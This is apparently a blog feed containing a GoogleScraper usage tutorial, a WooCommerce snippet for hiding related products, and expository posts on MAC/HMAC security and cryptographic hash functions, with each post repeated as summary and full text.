<span class="s2">"</span><span class="s">https://www.amazon.de/gp/product/B07BKN76JS/ref=s9_acsd_zwish_hd_bw_bDtHh_cr_x__w?pf_rd_m=A3JWKAKR8XB7XF&pf_rd_s=merchandised-search-8&pf_rd_r=TM716ESMTY46877D33XM&pf_rd_r=TM716ESMTY46877D33XM&pf_rd_t=101&pf_rd_p=5f7031a3-d321-54f0-8d79-d0961244d5fa&pf_rd_p=5f7031a3-d321-54f0-8d79-d0961244d5fa&pf_rd_i=3310781</span><span class="s2">"</span>
]}
<span class="nv">main</span><span class="ss">(</span><span class="nv">config</span><span class="ss">)</span>
</code></pre></div>
<p>Then just run the scraper:</p>
<div class="highlight"><pre><span></span><code>python src/scraper.py
</code></pre></div>GoogleScraper Tutorial - How to scrape 1000 keywords with Google2018-09-05T18:21:00+02:002018-09-07T18:00:00+02:00Nikolai Tschachertag:incolumitas.com,2018-09-05:/2018/09/05/googlescraper-tutorial/<p>Tutorial that teaches how to use GoogleScraper to scrape 1000 keywords with 10 selenium browsers.</p><p>In this tutorial we are going to show users how to use <a href="https://github.com/NikolaiT/GoogleScraper">GoogleScraper</a>.</p>
<p>The best way to learn a new tool is to use it in a real world case study. And because GoogleScraper allows you to
query search engines automatically, we are going to scrape 1000 keywords with GoogleScraper.</p>
<p>If you don't want to use this software to scrape data and you want this job to be done for you, you can submit a scrape job
at <a href="https://scrapeulous.com/">scrapeulous.com</a>. Or you can visit the <a href="https://incolumitas.com/pages/scrapeulous/">site that explains scrapeulous.com</a>.</p>
<p>Anyways, lets continue...</p>
<p>Let's assume that we want to create a business in the USA. We do not know in which industry yet and we do not know in which
city. Therefore we want to scrape some industries. I will take:</p>
<ol>
<li>coffee shop</li>
<li>pizza place</li>
<li>burger place</li>
<li>sea food restaurant</li>
<li>pastry shop</li>
<li>shoes repair</li>
<li>jeans repair</li>
<li>smartphone repair</li>
<li>wine shop</li>
<li>tea shop</li>
</ol>
<p>Because we do not now in which city we want to open our shop, we are going to combine the above shop places with the <strong>100 largest cities in the US</strong>. Here I found a <a href="https://gist.github.com/Miserlou/11500b2345d3fe850c92">list of the Largest 1000 Cities in America</a>. This will yield 1000 keyword combinations. You can see the final keyword file here: <a href="/data/list.txt">keyword file</a>.</p>
<h3>Installation of GoogleScraper</h3>
<p>First of all you need to install <strong>Python3</strong>. I personally use the <a href="https://www.anaconda.com/download/">Anaconda Python distribution</a>, because it ships with many precompiled scientific packages that I need to use in my everyday work. But you can install Python3 also directly from the <a href="https://www.python.org/downloads/">python website</a>.</p>
<p>Now I assume that you have <code>python3</code> installed. In my case I have:</p>
<div class="highlight"><pre><span></span><code>$ python3 --version
Python <span class="m">3</span>.7.0
</code></pre></div>
<p>Now you need <code>pip</code>, the package manager of python. It usually comes installed with python already. When you have pip, you can install
<code>virtualenv</code> with <code>pip install virtualenv</code>.</p>
<p>Now that you have virtualenv, go to your project directory and create a virtual environment with <code>virtualenv env</code>:</p>
<p>In my case it looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="n">nikolai</span><span class="err">@</span><span class="n">nikolai</span><span class="p">:</span><span class="o">~/</span><span class="n">projects</span><span class="o">/</span><span class="n">work</span><span class="o">/</span><span class="n">google</span><span class="o">-</span><span class="n">scraper</span><span class="o">-</span><span class="n">tutorial</span><span class="o">$</span><span class="w"> </span><span class="n">virtualenv</span><span class="w"> </span><span class="n">env</span><span class="w"></span>
<span class="n">Using</span><span class="w"> </span><span class="n">base</span><span class="w"> </span><span class="n">prefix</span><span class="w"> </span><span class="s1">'/home/nikolai/anaconda3'</span><span class="w"></span>
<span class="n">New</span><span class="w"> </span><span class="n">python</span><span class="w"> </span><span class="n">executable</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">nikolai</span><span class="o">/</span><span class="n">projects</span><span class="o">/</span><span class="n">work</span><span class="o">/</span><span class="n">google</span><span class="o">-</span><span class="n">scraper</span><span class="o">-</span><span class="n">tutorial</span><span class="o">/</span><span class="n">env</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">python</span><span class="w"></span>
<span class="n">copying</span><span class="w"> </span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">nikolai</span><span class="o">/</span><span class="n">anaconda3</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">python</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">nikolai</span><span class="o">/</span><span class="n">projects</span><span class="o">/</span><span class="n">work</span><span class="o">/</span><span class="n">google</span><span class="o">-</span><span class="n">scraper</span><span class="o">-</span><span class="n">tutorial</span><span class="o">/</span><span class="n">env</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">python</span><span class="w"></span>
<span class="n">Installing</span><span class="w"> </span><span class="n">setuptools</span><span class="p">,</span><span class="w"> </span><span class="n">pip</span><span class="p">,</span><span class="w"> </span><span class="n">wheel</span><span class="o">...</span><span class="n">done</span><span class="o">.</span><span class="w"></span>
</code></pre></div>
<p>Now we can activate the virtual environment and install GoogleScraper from the github repository:</p>
<div class="highlight"><pre><span></span><code><span class="err">#</span><span class="w"> </span><span class="n">Activate</span><span class="w"> </span><span class="n">environment</span><span class="w"></span>
<span class="n">nikolai</span><span class="nv">@nikolai</span><span class="err">:</span><span class="o">~/</span><span class="n">projects</span><span class="o">/</span><span class="k">work</span><span class="o">/</span><span class="n">google</span><span class="o">-</span><span class="n">scraper</span><span class="o">-</span><span class="n">tutorial</span><span class="err">$</span><span class="w"> </span><span class="n">source</span><span class="w"> </span><span class="n">env</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">activate</span><span class="w"></span>
<span class="p">(</span><span class="n">env</span><span class="p">)</span><span class="w"> </span><span class="n">nikolai</span><span class="nv">@nikolai</span><span class="err">:</span><span class="o">~/</span><span class="n">projects</span><span class="o">/</span><span class="k">work</span><span class="o">/</span><span class="n">google</span><span class="o">-</span><span class="n">scraper</span><span class="o">-</span><span class="n">tutorial</span><span class="err">$</span><span class="w"></span>
<span class="err">#</span><span class="w"> </span><span class="n">install</span><span class="w"> </span><span class="n">GoogleScraper</span><span class="w"></span>
<span class="n">pip</span><span class="w"> </span><span class="n">install</span><span class="w"> </span><span class="c1">--ignore-installed git+git://github.com/NikolaiT/GoogleScraper/</span>
</code></pre></div>
<p>Now you should be all set. When everything worked smoothely, you should have a similar output to this:</p>
<div class="highlight"><pre><span></span><code>$ GoogleScraper --version
<span class="m">0</span>.2.2
</code></pre></div>
<h3>Preparation and Scraping Options</h3>
<p>We will use the Google search engine soley. We will request 10 results per page and only 1 page for each query.</p>
<p>We are going to use 10 simultaenous browser instances in selenium mode. Therefore each browser needs to scrape 100 keywords.</p>
<p>We are going to use one IP address to test how far we can reach with GoogleScraper with a single IP address.</p>
<p>As output we want a <code>json</code> file.</p>
<p>We enable caching such that we don't have to start the scraping process from scratch if something fails.</p>
<p>We will pass all configuration via a configuration file to GoogleScraper. We can create such a configuration file
with the following command:</p>
<div class="highlight"><pre><span></span><code>GoogleScraper --view-config > config.py
</code></pre></div>
<p>Now the file <code>config.py</code> is our configuration file.</p>
<p>In this file set the following variables:</p>
<div class="highlight"><pre><span></span><code>google_selenium_search_settings = False
google_selenium_manual_settings = False
do_caching = True
do_sleep = True
</code></pre></div>
<h3>The Scraping</h3>
<p>Now you are ready to scrape. Enter the following command in your the terminal:</p>
<div class="highlight"><pre><span></span><code>GoogleScraper --config-file config.py -m selenium --sel-browser chrome --browser-mode normal --keyword-file list.txt -o results.json -z10
</code></pre></div>
<p>This will start 10 browser windows that begin to scrape the keywords in the provided file.</p>
<p>After about 22 minutes of scraping, I got the following <a href="/data/results.json">results in a json file</a>.
As you can see there are 1000 results with 10 results per page and all links and snippets and stuff. You can now
analize this data and make marketing decision based on it.</p>
<p>Here is a short video of how the scraping looks like: <a href="/data/video-scraping.gif">Video of scraping</a>.</p>Hide related products on shop page in Woocommerce2018-08-30T17:12:00+02:002018-08-30T17:12:00+02:00Nikolai Tschachertag:incolumitas.com,2018-08-30:/2018/08/30/wordpress-hide-related-products-in-woocommerce/<h2>Introduction</h2>
<p>I found many instructions and guides in the Internet that describe <strong>How to hide related products tab on shop page</strong> to be <strong>NOT WORKING!</strong></p>
<p>It's a freaking pain in the ass to hide your related products tab on your shop page. The method to actually hide related products depends on the WooCommerce theme that you are using. In this article, we are going to present a method that provably works for every theme and WooCommerce version out there.</p>
<h2>How to disable related products - Step by step guide</h2>
<p><strong>Step 1.</strong> Open the product page where your related products are shown. </p>
<p><strong>Step 2.</strong> Right click on the HTML with related products and open page inspect. See the picture below.</p>
<p><img src="/images/related-products-inspect.png" alt="Inspect element"/></p>
<p><strong>Step 3.</strong> Copy the class attribute of the container element that contains the related products HTML.</p>
<p><img src="/images/related-products-copy-class.png" alt="Copy css of container class"/></p>
<p><strong>Step 4.</strong> Insert the copied class code to this CSS code. In my case, I copied <code>related related-products-wrapper product-section</code> and the resulting CSS will look like this. So you only have to replace spaces <code>' '</code> with points <code>'.'</code>.</p>
<p>In my case the final CSS code looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="p">.</span><span class="nc">related</span><span class="p">.</span><span class="nc">related-products-wrapper</span><span class="p">.</span><span class="nc">product-section</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">display</span><span class="p">:</span><span class="w"> </span><span class="kc">none</span><span class="w"> </span><span class="cp">!important</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p><strong>Step 5.</strong> Replace CSS code from above with the line <code>{{YOUR CSS CODE HERE …</code></p><h2>Introduction</h2>
<p>I found many instructions and guides in the Internet that describe <strong>How to hide related products tab on shop page</strong> to be <strong>NOT WORKING!</strong></p>
<p>It's a freaking pain in the ass to hide your related products tab on your shop page. The method to actually hide related products depends on the WooCommerce theme that you are using. In this article, we are going to present a method that provably works for every theme and WooCommerce version out there.</p>
<h2>How to disable related products - Step by step guide</h2>
<p><strong>Step 1.</strong> Open the product page where your related products are shown. </p>
<p><strong>Step 2.</strong> Right click on the HTML with related products and open page inspect. See the picture below.</p>
<p><img src="/images/related-products-inspect.png" alt="Inspect element"/></p>
<p><strong>Step 3.</strong> Copy the class attribute of the container element that contains the related products HTML.</p>
<p><img src="/images/related-products-copy-class.png" alt="Copy css of container class"/></p>
<p><strong>Step 4.</strong> Insert the copied class code to this CSS code. In my case, I copied <code>related related-products-wrapper product-section</code> and the resulting CSS will look like this. So you only have to replace spaces <code>' '</code> with points <code>'.'</code>.</p>
<p>In my case the final CSS code looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="p">.</span><span class="nc">related</span><span class="p">.</span><span class="nc">related-products-wrapper</span><span class="p">.</span><span class="nc">product-section</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">display</span><span class="p">:</span><span class="w"> </span><span class="kc">none</span><span class="w"> </span><span class="cp">!important</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p><strong>Step 5.</strong> Replace CSS code from above with the line <code>{{YOUR CSS CODE HERE}}</code> in the following file:</p>
<div class="highlight"><pre><span></span><code><span class="x">add_action( 'wp_footer', 'incolumitas_add_inline_script' );</span>
<span class="x">function incolumitas_add_inline_script() {</span>
<span class="x"> ?></span>
<span class="x"> <style type="text/css"></span>
<span class="x"> {{YOUR CSS CODE HERE}}</span>
<span class="x"> </style></span>
<span class="x"> </span><span class="cp"><?php</span>
<span class="p">}</span>
</code></pre></div>
<p><strong>Step 6.</strong> Finally paste the resulting code at the end of your themes <code>functions.php</code>. In my case I needed to paste the following code at the end of my <code>functions.php</code>:</p>
<div class="highlight"><pre><span></span><code><span class="x">add_action( 'wp_footer', 'incolumitas_add_inline_script' );</span>
<span class="x">function incolumitas_add_inline_script() {</span>
<span class="x"> ?></span>
<span class="x"> <style type="text/css"></span>
<span class="x"> .related.related-products-wrapper.product-section {</span>
<span class="x"> display: none !important;</span>
<span class="x"> }</span>
<span class="x"> </style></span>
<span class="x"> </span><span class="cp"><?php</span>
<span class="p">}</span>
</code></pre></div>
<p>You can edit your <code>functions.php</code> in the admin menu under <strong>Appearance -> Editor</strong>.</p>
<h3>Pro tip: If you you use Autooptimize plugin</h3>
<p>You need to delete the cache of the Autooptimize plugin for the changes to work!</p>
<p>Let me know whether this instruction worked for you.</p>Cryptographic properties of MACs and HMACs2018-08-20T21:53:00+02:002018-08-20T22:00:00+02:00Nikolai Tschachertag:incolumitas.com,2018-08-20:/2018/08/20/cryptographic-properties-mac-and-hmac/<h2>Introduction</h2>
<p>Similarly as digital signatures, <strong>Message Authentication Codes</strong> provide message integrity and message authentication. When Alice generates a MAC and sends the message and MAC to Bob, Bob verifies that the message has integrity by calculating the MAC himself. He also authenticates the message, because only Alice could have generated the MAC.</p>
<p>Unlike digital signatures they do however not provide nonrepudiation, since all involved parties share the secret key <span class="math">\(k\)</span>. MAC's can be implemented using cryptographically secure hash functions (HMAC) or symmetric block ciphers like AES.</p>
<p>A MAC consists of a set of messages <span class="math">\(X\)</span>, a finite set of hash values <span class="math">\(Y\)</span> and a key space <span class="math">\(K\)</span>. Each key <span class="math">\(k\)</span> specifies a hash function <span class="math">\(h_k: X \rightarrow Y\)</span>. Let <span class="math">\(n=|X|\)</span> and <span class="math">\(m=|Y|\)</span> and <span class="math">\(l=|K|\)</span>.</p>
<p>Each MAC must have a property known as <strong>computation resistance</strong>: Even if an attacker knows <span class="math">\(n\)</span> text-hash pairs <span class="math">\((x_n, h_k(x_n))\)</span>, it remains computationally unfeasible to find a valid MAC for a message without knowledge of the used key <span class="math">\(k\)</span>.</p>
<p>The goal of an attacker is to compute a valid MAC for a message <span class="math">\(x \in X\)</span> without knowing the secret key <span class="math">\(k\)</span>. There are a series of different …</p><h2>Introduction</h2>
<p>Similarly as digital signatures, <strong>Message Authentication Codes</strong> provide message integrity and message authentication. When Alice generates a MAC and sends the message and MAC to Bob, Bob verifies that the message has integrity by calculating the MAC himself. He also authenticates the message, because only Alice could have generated the MAC.</p>
<p>Unlike digital signatures they do however not provide nonrepudiation, since all involved parties share the secret key <span class="math">\(k\)</span>. MAC's can be implemented using cryptographically secure hash functions (HMAC) or symmetric block ciphers like AES.</p>
<p>A MAC consists of a set of messages <span class="math">\(X\)</span>, a finite set of hash values <span class="math">\(Y\)</span> and a key space <span class="math">\(K\)</span>. Each key <span class="math">\(k\)</span> specifies a hash function <span class="math">\(h_k: X \rightarrow Y\)</span>. Let <span class="math">\(n=|X|\)</span> and <span class="math">\(m=|Y|\)</span> and <span class="math">\(l=|K|\)</span>.</p>
<p>Each MAC must have a property known as <strong>computation resistance</strong>: Even if an attacker knows <span class="math">\(n\)</span> text-hash pairs <span class="math">\((x_n, h_k(x_n))\)</span>, it remains computationally unfeasible to find a valid MAC for a message without knowledge of the used key <span class="math">\(k\)</span>.</p>
<p>The goal of an attacker is to compute a valid MAC for a message <span class="math">\(x \in X\)</span> without knowing the secret key <span class="math">\(k\)</span>. There are a series of different attack categories:</p>
<ul>
<li><strong>Impersonation: </strong>The attacker knows only which MAC is used and tries to generate a valid MAC with the unknown key <span class="math">\(k\)</span>. He tries to act like a person who owns the key.</li>
<li><strong>Substitution: </strong> The attacker knows the MAC value for one message <span class="math">\(x\)</span> and tries to find a valid MAC for another message <span class="math">\(x'\)</span> such that <span class="math">\(x \notin x'\)</span>.</li>
<li><strong>Known-text attack: </strong> The attacker knows for a bunch of texts <span class="math">\(x_1, ..., x_r\)</span> he has not chosen himself the corresponding MAC values. He tries to generate a new MAC for a new message <span class="math">\(x' \notin \{x_1, ..., x_r\}\)</span></li>
<li><strong>Chosen-text attack: </strong> The attacker can choose the texts himself.</li>
<li><strong>Adaptive chosen-text attack: </strong> The attacker can chose a text for which he receives a MAC under the knowledge of the previous MACs.</li>
</ul>
<h2>Information Theoretic Security of MACs (After Shannon)</h2>
<p>The underlying model is that keys <span class="math">\(k\)</span> and messages <span class="math">\(x\)</span> are generated independent from each other such that <span class="math">\(p(k \cap x) = p(k)p(x)\)</span>.</p>
<h4>Impersonation Success Probability</h4>
<p>Let <span class="math">\(\alpha\)</span> be the probability that an Oscar can pretend to be Alice without Bob realizing it. The probability <span class="math">\(p(x \rightarrow y)\)</span> is the probability that a random message maps to the MAC value. This is the same as the sum of all probabilities that we randomly pick a key that maps the message to the MAC value. <span class="math">\(\alpha(x) = \text{max}\{\alpha(x,y)|y \in Y\}\)</span></p>
<p>It is easy to see that <span class="math">\(\alpha(x) \geq \frac{1}{m}\)</span> where <span class="math">\(m\)</span> the size of the set of all possible MACs. When <span class="math">\(\chi\)</span> is a random variable and has values in the positive real numbers, then </p>
<div class="math">$$log(E(\chi)) \geq E(log(\chi))$$</div>
<p>Then for each <span class="math">\(MAC_h(x)=y\)</span> the following inequality holds </p>
<div class="math">$$\alpha \geq \frac{1}{2^{H(K)-H(K|X,Y)}} \geq 1/l$$</div>
<p> This inequality makes a statement about the impersonation probability <span class="math">\(\alpha\)</span> given the entropy <span class="math">\(H\)</span>. <span class="math">\(\alpha\)</span> becomes smaller while the key distribution becomes more uniform. The smaller the conditional entropy <span class="math">\(H(K|X,Y)\)</span>, the smaller becomes the impersonation probability <span class="math">\(\alpha\)</span>. <span class="math">\(H(K|X,Y)\)</span> measures the entropy of the key distribution <span class="math">\(K\)</span> that is not revealed by <span class="math">\(X\)</span> and <span class="math">\(Y\)</span>.</p>
<p>Entropy is a measurement of uncertainty of outcome. For example the entropy <span class="math">\(H\)</span> of <span class="math">\(n\)</span> independent coin tosses is <span class="math">\(n\)</span>, since <span class="math">\(n\)</span> coin tosses can be encoded with a bitstring of length <span class="math">\(n\)</span>. <strong>Entropy</strong> is defined over a discrete random variable <span class="math">\(X\)</span> </p>
<div class="math">$$H(X) = -\sum_{x \in X}(Pr(x)*log_2(Pr(x)))$$</div>
<p> Note that the logarithm of a probability is negative, and thus the whole sum is multiplied again with <span class="math">\(-1\)</span> to obtain a positive value.</p>
<p><strong>Jensens inequality</strong> plays also a big role in information theory. Let <span class="math">\(f\)</span> be a continuous strictly concave function (like the <span class="math">\(log\)</span> function) and <span class="math">\(A\)</span> be a probability distribution. Then
</p>
<div class="math">$$\sum_{i=1}^{n}a_if(x_i) \leq f(\sum_{i=1}^{n}a_ix_i)$$</div>
<p>We can derive with the above results that <span class="math">\(H(X,Y) \leq H(X)+H(Y)\)</span> with equality only if <span class="math">\(X\)</span> and <span class="math">\(Y\)</span> are <strong>independent random variables</strong>.</p>
<p>Now we can define <strong>conditional entropy</strong>. Conditional entropy <span class="math">\(H(X|Y)\)</span> measures the average amount of information about the random variable <span class="math">\(X\)</span> that is not revealed by <span class="math">\(Y\)</span>.
</p>
<div class="math">$$H(X|Y) = -\sum_{y \in Y}\sum_{x \in X}Pr(y)Pr(x|y)log(Pr(x|y))$$</div>
<h4>Substitution Success Probability</h4>
<p>Let <span class="math">\(\beta\)</span> be the substitution success probability that he manages to substitute a fixed message <span class="math">\(x\)</span> with <span class="math">\(x'\)</span>. Then the success probability is <span class="math">\(p(x' \rightarrow y' | x \rightarrow y)\)</span>. The maximal success probability of substitution can be denoted as </p>
<div class="math">$$\beta(x,y) = \text{max } p(x' \rightarrow y' | x \rightarrow y)$$</div>
<p>.</p>
<p>The lower bound of success is the same as for <span class="math">\(\alpha\)</span>: <span class="math">\(\beta(x,y) \geq 1/m\)</span></p>
<p>A MAC is called <strong>2-universal</strong> if </p>
<div class="math">$$|K(x,y,x',y')| = \frac{|K|}{m^2}$$</div>
<p> For 2-universal MACs it holds that <span class="math">\(|K| \geq m^2\)</span> A MAC has substitution success probability <span class="math">\(\beta=\frac{1}{m}\)</span> exactly then when he is 2-universal. Then also <span class="math">\(\alpha = \frac{1}{m}\)</span>.</p>
<p>A simple example for a 2-universal MAC is <span class="math">\(h_{a,b}(x) = ax + b \mod p\)</span> where <span class="math">\((a,b) \in Z \times Z\)</span> and <span class="math">\(p\)</span> is prime.</p>
<p>To obtain a MAC with compression functionality, once can use a construction such as
</p>
<div class="math">$$h_k(x) = kx = \sum_{i=1}^d k_ix_i \mod p$$</div>
<p> where <span class="math">\(d\)</span> is the size of the vector for <span class="math">\((x_1,...,x_d)\)</span> and <span class="math">\((k_1,...,k_d)\)</span></p>
<h2>HMAC</h2>
<p>Intuitively one would create a HMAC in one of the following ways <span class="math">\(MAC_k(x) = h(k||x)\)</span> or <span class="math">\(MAC_k(x) = h(x||k)\)</span> However those constructions suffer from weaknesses.</p>
<h3>Attack on <span class="math">\(MAC_k(x) = h(k||x)\)</span></h3>
<p>Let's assume <span class="math">\(h\)</span> uses the Merkle Damgård Construction. Alice creates the MAC <span class="math">\(m\)</span> for a message <span class="math">\(x=x_1||...||x_n\)</span>. Then an attacker can append an arbitrary message block <span class="math">\(x_{n+1}\)</span> to <span class="math">\(x\)</span> and receives a valid MAC <span class="math">\(m' = MAC_k(m, x_{n+1})\)</span>. Thus the attacker can create valid MACS for messages he already knows the MAC for. The attacker controls what comes after the original message.</p>
<h3>Attack on <span class="math">\(MAC_k(x) = h(x||k)\)</span></h3>
<p>If we find a collision for <span class="math">\(x\)</span> such that <span class="math">\(h(x)=h(x')\)</span>, then <span class="math">\(MAC_k(x) = MAC_k(x') = h(x||k) = h(x'||k)\)</span> because the iterative nature of the Merkle Damgård Construction and that the message after x and x' is identical.</p>
<h3>Better HMAC</h3>
<p>Knowing the difficulties of HMAC creation, if we construct a HMAC like </p>
<div class="math">$$HMAC_k(x)=h((k \oplus \text{ opad })||h((k \oplus \text{ ipad })||x))$$</div>
<p> with the <span class="math">\(k\)</span> being left padded with zeros to match the block size <span class="math">\(b\)</span>. Usually <strong>SHA-1</strong> is used as <span class="math">\(h\)</span>. The padded key is then XORed with ipad and opad, where <span class="math">\(\text{ipad}=36||...||36\)</span> and <span class="math">\(\text{opad}=5C||...||5C\)</span> are 512 bit constants of a repetitive bit pattern with length 64. <span class="math">\(f = h((k \oplus \text{ ipad })||x)\)</span> is a keyed hash function that hashes arbitrarily sized inputs and <span class="math">\(g = h((k \oplus \text{ opad })||y)\)</span> takes a input of exactly 512 bit.</p>
<p>When <span class="math">\(f\)</span> is collision resistant and <span class="math">\(g\)</span> is computation resistant, HMAC is computation resistant.</p>
<p>When there is no adaptive <span class="math">\((\epsilon_1,q+1)\)</span> collision attack on <span class="math">\(f\)</span> and no adaptive <span class="math">\((\epsilon_2,q)\)</span> forgery for <span class="math">\(g\)</span>, then there is no <span class="math">\((\epsilon_1+\epsilon_2,q+1)\)</span> forgery for the HMAC.</p>
<p>It can be proven that the HMAC construction above is secure if the used hash function is collision free. So in order to break the HMAC, one must find collisions for the used hash function (For example SHA-2).</p>
<h2>CBC-MAC</h2>
<p>One can also create hashes with block ciphers such as with AES used in cipher block chaining mode (CBC). MAC creation is simply the repeated encryption of the message blocks XORed with the previous result of the encryption (Similarly as the sponge construction). The initial encryption uses a random and public IV.
</p>
<div class="math">$$y_1 = e_k(x_1 \oplus IV)$$</div>
<p> to start and
</p>
<div class="math">$$y_i = e_k(x_i \oplus y_{i-1})$$</div>
<p> takes each message block <span class="math">\(x_i\)</span> and XORs it with the output of the previous round. Then the final MAC is set as the final result of all encryptions <span class="math">\(MAC_k(x) = y_n\)</span></p>
<p>There is an <strong>adaptive chosen text attack</strong> on a CBC-MAC when CBC-MACs are used without preprocessing. If the attacker knows the MAC values <span class="math">\(z=h_k(x)\)</span> and <span class="math">\(z'=h_k(x')\)</span> for the texts <span class="math">\(x=x_1||...||x_n\)</span> and <span class="math">\(x'=(x_{n+1} \oplus IV \oplus z)||x_{n+2}||...||x_{n+m}\)</span>, then the MAC value <span class="math">\(h_k(x'') = z'\)</span> for the message <span class="math">\(x''=x_1||...||x_{n+m}\)</span>.</p>
<p>This attack is not possible if only messages with fixed lengths <span class="math">\(nt\)</span> are allowed.</p>
<p>There is also an <strong>birthday attack</strong> on CBC-MACs where you need <span class="math">\(q \approx 2^{t/2}\)</span> queries to obtain the MAC value for an message <span class="math">\(x\)</span> that was not queried before. <span class="math">\(x\)</span> can be arbitrarily chosen, except the first t-bit-block is given. <span class="math">\(x\)</span> is a <span class="math">\(tn\)</span> long bitstring. The attacker chooses <span class="math">\(n-2\)</span> arbitrary t-bit-blocks and two times <span class="math">\(q\)</span> pairwise-different t-bit-blocks. He then queries the MAC values <span class="math">\(z_i = h_k(x^i)\)</span> for the selected messages. If there is a collision pair for the computed MACs, he will find them.</p>
<p>The above described attack is a <span class="math">\((\epsilon, q+1)\)</span>-Attack for <span class="math">\(q \approx 1.17\cdot2^{t/2}\)</span>. Only the last query is adaptive, all the <span class="math">\(q\)</span> prior are non adaptive.</p>
<p>In general there are <strong>adaptive queries</strong>, where the query <span class="math">\(x_i\)</span> depends on the queries <span class="math">\(x_1, ..., x_{i-1}\)</span> before. Non-adaptive queries do not need knowledge about the prior queries. Then there are <strong>selective forgeries</strong>, where the attacker can obtain the MAC value for a message he has chosen. Then there are <strong>existential forgeries</strong>, where the attacker can obtain a forgery but cannot chose which one.</p>
<script type="text/javascript">if (!document.getElementById('mathjaxscript_pelican_#%@#$@#')) {
var align = "left",
indent = "0em",
linebreak = "false";
if (false) {
align = (screen.width < 768) ? "left" : align;
indent = (screen.width < 768) ? "0em" : indent;
linebreak = (screen.width < 768) ? 'true' : linebreak;
}
var mathjaxscript = document.createElement('script');
mathjaxscript.id = 'mathjaxscript_pelican_#%@#$@#';
mathjaxscript.type = 'text/javascript';
mathjaxscript.src = 'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.3/latest.js?config=TeX-AMS-MML_HTMLorMML';
var configscript = document.createElement('script');
configscript.type = 'text/x-mathjax-config';
configscript[(window.opera ? "innerHTML" : "text")] =
"MathJax.Hub.Config({" +
" config: ['MMLorHTML.js']," +
" TeX: { extensions: ['AMSmath.js','AMSsymbols.js','noErrors.js','noUndefined.js'], equationNumbers: { autoNumber: 'none' } }," +
" jax: ['input/TeX','input/MathML','output/HTML-CSS']," +
" extensions: ['tex2jax.js','mml2jax.js','MathMenu.js','MathZoom.js']," +
" displayAlign: '"+ align +"'," +
" displayIndent: '"+ indent +"'," +
" showMathMenu: true," +
" messageStyle: 'normal'," +
" tex2jax: { " +
" inlineMath: [ ['\\\\(','\\\\)'] ], " +
" displayMath: [ ['$$','$$'] ]," +
" processEscapes: true," +
" preview: 'TeX'," +
" }, " +
" 'HTML-CSS': { " +
" availableFonts: ['STIX', 'TeX']," +
" preferredFont: 'STIX'," +
" styles: { '.MathJax_Display, .MathJax .mo, .MathJax .mi, .MathJax .mn': {color: 'black ! important'} }," +
" linebreaks: { automatic: "+ linebreak +", width: '90% container' }," +
" }, " +
"}); " +
"if ('default' !== 'default') {" +
"MathJax.Hub.Register.StartupHook('HTML-CSS Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax['HTML-CSS'].FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"MathJax.Hub.Register.StartupHook('SVG Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax.SVG.FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"}";
(document.body || document.getElementsByTagName('head')[0]).appendChild(configscript);
(document.body || document.getElementsByTagName('head')[0]).appendChild(mathjaxscript);
}
</script>Cryptographic Hash Functions2018-08-18T21:39:00+02:002018-08-19T15:00:00+02:00Nikolai Tschachertag:incolumitas.com,2018-08-18:/2018/08/18/cryptographic-hash-functions/<h2>Introduction</h2>
<p>This blog post will introduce cryptographic hash functions. We are going to discuss the <strong>Merkle-Damgård construction</strong> which underlies many hash functions that were and are used nowadays. The <strong>MD4, MD5, SHA-1 and SHA-2</strong> hash families are all functions that built on top of the <strong>Merkle-Damgård construction</strong>. Then we will introduce an alternative construction that was popularized during the publication of <strong>Keccak (SHA-3)</strong>: The <strong>Sponge construction</strong>.</p>
<p>But what are cryptographic hash functions good for?</p>
<p>The general idea is to apply a unique and stable fingerprint to each input data <span class="math">\(x\)</span>. This fingerprint is computed with a hash function <span class="math">\(h\)</span> and the resulting value <span class="math">\(y = h(x)\)</span> is called a message digest. The size of <span class="math">\(h(x)\)</span> is fixed, even though the input data <span class="math">\(x\)</span> may have arbitrary length. The intended task for <span class="math">\(h\)</span> is to assign a unique identification code <span class="math">\(h(x)\)</span> for each input <span class="math">\(x \in X\)</span> where <span class="math">\(X\)</span> is the set of all possible inputs. The avid reader might realize that this task is impossible, since there is no bijective function that connects an infinite large input set <span class="math">\(X\)</span> with fixed sized output set <span class="math">\(h(x)\)</span>. Thus there must be collisions: For some inputs <span class="math">\(x_1 \neq x …</span></p><h2>Introduction</h2>
<p>This blog post will introduce cryptographic hash functions. We are going to discuss the <strong>Merkle-Damgård construction</strong> which underlies many hash functions that were and are used nowadays. The <strong>MD4, MD5, SHA-1 and SHA-2</strong> hash families are all functions that built on top of the <strong>Merkle-Damgård construction</strong>. Then we will introduce an alternative construction that was popularized during the publication of <strong>Keccak (SHA-3)</strong>: The <strong>Sponge construction</strong>.</p>
<p>But what are cryptographic hash functions good for?</p>
